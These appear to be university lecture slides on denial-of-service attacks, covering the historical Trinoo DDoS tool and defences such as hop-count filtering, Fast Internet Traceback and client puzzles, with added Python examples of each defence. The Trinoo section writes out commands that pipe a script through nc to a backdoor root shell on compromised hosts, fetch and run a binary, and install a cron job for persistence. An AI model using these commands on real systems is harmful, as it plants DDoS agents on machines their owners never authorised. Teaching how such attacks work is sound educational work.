Network Security: CIA + Availability
By Jinjian Ma

Topics
• DoS/DDoS
• Detection & Defense
• Prevention
DoS/DDoS types
• Vulnerability attack
• Flooding attack

DoS vs DDoS
DoS:
• The attack is launched from a single host
• Less powerful
DDoS:
• Two components: agent & handler
• Hard to defend against

DDoS step by step
1. The attacker has some knowledge of a program/system flaw
2. Scan the network and build a list of compromised hosts
3. Select the desired architecture
4. Distribute agents and, optionally, hide the agent process
5. Launch the attack

Real-life example: Trinoo (1999)
• An easy-to-use DDoS tool
• Free download
• Master and daemon network
Trinoo deployment
Attacker: "I will exploit TCP port 1524 to do something evil."
• The Ingreslock backdoor uses port 1524; telnet to it will give you a root shell
• nmap scan for port 1524

Trinoo deployment
  ./trin.sh | nc A.A.A.A 1524 &
  ./trin.sh | nc B.B.B.B 1524 &
  ./trin.sh | nc C.C.C.C 1524 &
  ./trin.sh | nc D.D.D.D 1524 &
A.A.A.A, B.B.B.B, C.C.C.C, D.D.D.D: compromised hosts found by the scan
Note: you can imagine nc does almost the same thing as telnet

trin.sh (the script piped to each compromised host above)
  echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
  echo "echo rcp is done moving binary"
  echo "chmod +x /usr/sbin/rpc.listen"
  echo "echo launching trinoo"
  echo "/usr/sbin/rpc.listen"
  echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
  echo "crontab cron"
  echo "echo launched"
  echo "exit"
Trinoo network
• The attacker uses telnet to interact with the masters
• Masters send messages to the daemons; each daemon listens on a port and is connected to a master
• The daemons flood the victim with messages

Attack using Trinoo
1. Prepare daemons on compromised hosts
2. Launch masters, enter password (gOrave)
3. Telnet to masters, enter password (betaalmostdone)
4. Now you can control a DDoS attack
• Control packet size
• Decide attack duration
• Stop/start the attack

Attack using Trinoo (screenshots)
• Show active daemons
• Launch an attack
Daemon source code

Attacks based on DDoS …
• ICMP smurf flooding: forge the ICMP source address to be the victim
• TCP SYN flooding
• UDP flooding
• …

Detection & Defense
• Hop-count
• IP traceback
• Intrusion Detection Systems (IDS)
When hop-count is useful
Attackers want to:
1. Conceal the flooding sources and the localities of the flooding traffic
2. Coax uncompromised hosts into becoming reflectors
Idea:
1. Modern OSs use only a few selected initial TTLs, typically 30, 32, 60, 64, 128, 255
2. Maintain an IP-to-hop-count map table

Hop-count
Pros:
• Easy to implement, using the existing TTL field
• Effective against IP spoofing
Cons:
• Forged packets have the same hop-count as the zombies that send them
• Does not help against attacks which do not spoof IP addresses
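The hop-count idea from the two slides above, worked through in Python as an added example (not code from the slides): infer the initial TTL from the observed one, learn an IP-to-hop-count table from traffic known to be legitimate, then flag packets whose hop count does not match the table. The addresses, TTLs and the "flood" are constructed; the rule for resolving the 30/32 and 60/64 ambiguity is an assumption documented in the code.

```python
# Added example: hop-count filtering (HCF) in Python.
# Assumptions: traffic is a list of (source_ip, observed_ttl) pairs, and the
# samples used to build the map are trustworthy (taken during normal operation,
# e.g. from completed TCP handshakes). All addresses and TTLs are constructed.

# Initial TTL values that modern operating systems commonly use (from the slides).
INITIAL_TTLS = (30, 32, 60, 64, 128, 255)


def infer_initial_ttl(observed_ttl):
    """Smallest common initial TTL that is >= the observed TTL.

    The pairs 30/32 and 60/64 are ambiguous (an observed 59 may be 60-1 or
    64-5). Assumed rule: pick the smallest candidate, and apply the same rule
    when the map is built and when packets are checked, so the stored value is
    a consistent signature of the path even when it is not the true hop count.
    """
    for initial in INITIAL_TTLS:
        if observed_ttl <= initial:
            return initial
    raise ValueError(f"impossible TTL {observed_ttl}")


def hop_count(observed_ttl):
    """Hops travelled = inferred initial TTL minus the TTL we received."""
    return infer_initial_ttl(observed_ttl) - observed_ttl


def build_hop_map(legitimate_samples):
    """IP -> hop-count table learned from traffic known to be genuine."""
    return {ip: hop_count(ttl) for ip, ttl in legitimate_samples}


def classify(packet, hop_map):
    """'ok' if the hop count matches the learned value, 'spoofed' if it does
    not, 'unknown' for sources without an entry (a filter would rate-limit
    those rather than drop them outright)."""
    src_ip, ttl = packet
    expected = hop_map.get(src_ip)
    if expected is None:
        return "unknown"
    return "ok" if hop_count(ttl) == expected else "spoofed"


def filter_traffic(packets, hop_map):
    """Return the verdict for every packet, in order."""
    return [classify(p, hop_map) for p in packets]


# Constructed training data: (source IP, TTL observed at our server).
LEGITIMATE_SAMPLES = [
    ("198.51.100.7", 113),   # initial 128, 15 hops away
    ("203.0.113.5", 243),    # initial 255, 12 hops away
    ("192.0.2.9", 52),       # initial 60 (or 64), signature 8
]

# Constructed flood: two genuine packets, two with a spoofed source address
# (sent by zombies sitting at a different distance), one from an unknown source.
FLOOD = [
    ("198.51.100.7", 113),
    ("203.0.113.5", 241),    # claims to be .5 but arrived 14 hops away, not 12
    ("192.0.2.9", 52),
    ("198.51.100.7", 50),    # claims to be .7 but looks 10 hops from a 60/64-TTL OS
    ("10.0.0.1", 60),
]

if __name__ == "__main__":
    table = build_hop_map(LEGITIMATE_SAMPLES)
    for pkt, verdict in zip(FLOOD, filter_traffic(FLOOD, table)):
        print(pkt, verdict)
```

The second "Cons" bullet is visible in the data: a zombie that happens to sit at the same hop count as the address it forges produces an "ok" verdict, so HCF narrows the spoofing space rather than eliminating it.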
IP traceback
Trace back the true attacking source
• Router packet marking
• Path reconstruction algorithm
Example: Fast Internet Traceback (FIT)

Fast Internet Traceback
• C: a global constant
• b: the 6th bit in TTL
Fast Internet Traceback: packets as seen by the victim
Packets marked by a FIT router (ID carries part of the router's IP hash, TTL carries C):
• ID: 111 (4th part of IP hash), TTL: 245 -> 1111 0101
• ID: 111 (4th part of IP hash), TTL: 244 -> 1111 0100
• ID: 111 (4th part of IP hash), TTL: 246 -> 1111 0110
• ID: 111 (4th part of IP hash), TTL: 243 -> 1111 0011
Packets that did not pass a FIT router (ordinary ID, TTL only decremented):
• ID: 0101100000000000, TTL: 254 -> 1111 1110
• ID: 0101100000000000, TTL: 253 -> 1111 1101
• ID: 0101100000000000, TTL: 255 -> 1111 1111
Victim, on the marked packet with TTL 243: "This packet came from a FIT router 3 hops away from me!" (b is the 6th bit in TTL)

Fast Internet Traceback: marking at a FIT router
• Original TTL: 253 -> (1111 1101); b (6th bit in TTL): 1
• C = 22 -----------> (1 0110)
• New TTL: 246 ---> (1111 0110)
• Marking probability: 0.04
• Observed TTLs at the victim: 245, 244, 243

Fast Internet Traceback: distance reconstruction at the victim
• Observed TTL: 243 --> (1111 0011)
• d = (b|C - TTL[5:0]) mod 64
• C = 22 ---> (1 0110), b: 1
• d = (1|1 0110 - 11 0011) mod 64 = 3 mod 64 = 3 hops away from the FIT router
• The server maintains a map of IP hashes, precomputed before the attack

Fast Internet Traceback
Pros:
• Not every router has to be a FIT router
• Does not violate the original design of the IP header
Cons:
• Not effective against spoofed IP
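The FIT marking and reconstruction on the preceding slides, carried through in Python as an added example (not code from the slides or from the FIT authors). It reproduces the slide values (C = 22, original TTL 253, marked TTL 246, distance 3 after three hops) and also the case the formula is designed for: a path long enough that decrementing the TTL flips its 6th bit. The layout of the 16-bit ID field (1 bit b, 2 bits fragment index, 13 bits of hash), the hash function (SHA-256) and the four-way split of the hash are assumptions; the slides only say "IP hash" and "4th part". Router addresses are constructed.

```python
# Added example: FIT-style packet marking and distance reconstruction.
# Assumed ID-field layout after marking: b (1 bit) | fragment index (2 bits) |
# 13-bit fragment of a hash of the marking router's IP. SHA-256 and the
# 4-fragment split are assumptions, not the slides' definition.
import hashlib

C = 22            # global constant written into the low 5 bits of TTL (slide value)
FRAGMENTS = 4
FRAG_BITS = 13


def hash_fragment(router_ip, index):
    """13-bit fragment `index` (0..3) of a 52-bit hash of the router's address."""
    digest = hashlib.sha256(router_ip.encode()).digest()
    h = int.from_bytes(digest[:8], "big")
    return (h >> (FRAG_BITS * index)) & ((1 << FRAG_BITS) - 1)


def mark(packet, router_ip, index):
    """What a FIT router does to a packet it decides to mark (probability 0.04
    on the slides; here the caller decides). Returns a new packet dict."""
    ttl = packet["ttl"]
    b = (ttl >> 5) & 1                      # remember the 6th bit of TTL
    marked_ttl = (ttl & ~0x1F) | C          # low 5 bits := C
    ident = (b << 15) | (index << 13) | hash_fragment(router_ip, index)
    return {"ttl": marked_ttl, "id": ident}


def forward(packet, hops):
    """Ordinary routers just decrement TTL once per hop."""
    return {"ttl": packet["ttl"] - hops, "id": packet["id"]}


def reconstruct(packet):
    """Victim side: recover (distance, fragment index, hash fragment).
    d = (b|C - TTL[5:0]) mod 64, as on the slides. b is taken from the ID
    field rather than from the received TTL, because decrementing across a
    multiple of 32 flips the 6th bit of TTL and would make d wrong."""
    ident = packet["id"]
    b = (ident >> 15) & 1
    index = (ident >> 13) & 3
    fragment = ident & ((1 << FRAG_BITS) - 1)
    d = (((b << 5) | C) - (packet["ttl"] & 0x3F)) % 64
    return d, index, fragment


def precompute_table(fit_routers):
    """(fragment index, fragment value) -> router IP, built before any attack."""
    return {(i, hash_fragment(ip, i)): ip
            for ip in fit_routers for i in range(FRAGMENTS)}


def identify(packet, table):
    """Return (router IP or None, distance in hops) for a received packet."""
    d, index, fragment = reconstruct(packet)
    return table.get((index, fragment)), d


# Constructed FIT deployment known to the victim.
FIT_ROUTERS = ["192.0.2.1", "203.0.113.1", "198.51.100.1"]

if __name__ == "__main__":
    table = precompute_table(FIT_ROUTERS)
    pkt = mark({"ttl": 253, "id": 0x5800}, "198.51.100.1", 3)   # slide values
    print(pkt["ttl"])                                  # 246
    print(identify(forward(pkt, 3), table))            # ('198.51.100.1', 3)
    print(identify(forward(pkt, 30), table))           # still correct after 30 hops
```

Because only 13 bits of the hash travel in each packet, the victim needs several marked packets (different fragment indices) from the same router before the match in the precomputed table is trustworthy; a single fragment can collide between routers.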
Prevention
• Redundant service
• Defense using puzzles
• Pushback
Challenge: no security policies can be globally enforced

Questions?

Recommended reading

More recommended reading
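One concrete form of the "defense using puzzle" bullet, as an added Python example (not from the slides): a hash-based client puzzle. Before the server commits resources to a request, it hands out a puzzle whose solution costs the client roughly 2^difficulty hash computations but costs the server a single hash to check, and the difficulty is raised as load grows. The server secret, client addresses, epoch handling and the load-to-difficulty policy are constructed assumptions.

```python
# Added example: hash-based client puzzle with a stateless issuing server.
# Secret, addresses and the difficulty policy are constructed for illustration.
import hashlib
import hmac

SOLUTION_BYTES = 8


def leading_zero_bits(digest):
    """Number of leading zero bits in a 32-byte digest."""
    return 256 - int.from_bytes(digest, "big").bit_length()


def puzzle_hash(nonce, solution):
    return hashlib.sha256(nonce + solution.to_bytes(SOLUTION_BYTES, "big")).digest()


def verify(nonce, difficulty, solution):
    """One hash for the server to check work that cost the client ~2**difficulty hashes."""
    return leading_zero_bits(puzzle_hash(nonce, solution)) >= difficulty


def solve(nonce, difficulty):
    """Client side: brute-force the smallest solution (expected 2**difficulty tries)."""
    solution = 0
    while not verify(nonce, difficulty, solution):
        solution += 1
    return solution


class PuzzleServer:
    """Stateless issuer: the nonce is an HMAC over client address, time epoch
    and difficulty, so the server keeps no per-client state, a solution cannot
    be replayed for another client or epoch, and the client cannot lower the
    difficulty without changing the nonce it has to solve for."""

    def __init__(self, secret, base_difficulty=12):
        self.secret = secret
        self.base_difficulty = base_difficulty
        self.difficulty = base_difficulty

    def adjust(self, pending_requests):
        """Constructed policy: one extra bit per 100 pending requests, capped at 24."""
        self.difficulty = min(24, self.base_difficulty + pending_requests // 100)

    def _nonce(self, client_addr, epoch, difficulty):
        msg = f"{client_addr}|{epoch}|{difficulty}".encode()
        return hmac.new(self.secret, msg, hashlib.sha256).digest()[:16]

    def issue(self, client_addr, epoch):
        difficulty = self.difficulty
        return self._nonce(client_addr, epoch, difficulty), difficulty

    def accept(self, client_addr, epoch, difficulty, solution):
        """Recompute the nonce instead of looking it up; reject puzzles that
        were issued at a difficulty below the current load-driven minimum."""
        if difficulty < self.difficulty:
            return False
        return verify(self._nonce(client_addr, epoch, difficulty), difficulty, solution)


if __name__ == "__main__":
    server = PuzzleServer(b"constructed-server-secret")
    nonce, difficulty = server.issue("203.0.113.5", epoch=1)
    answer = solve(nonce, difficulty)                          # the client's work
    print(answer, server.accept("203.0.113.5", 1, difficulty, answer))   # ..., True
```

In a real deployment the epoch would be derived from the clock so that old solutions expire, and the puzzle round trip only helps against floods where the attacker's CPU is the bottleneck; it does nothing for bandwidth floods, which is why the slide lists it alongside redundancy and pushback rather than instead of them.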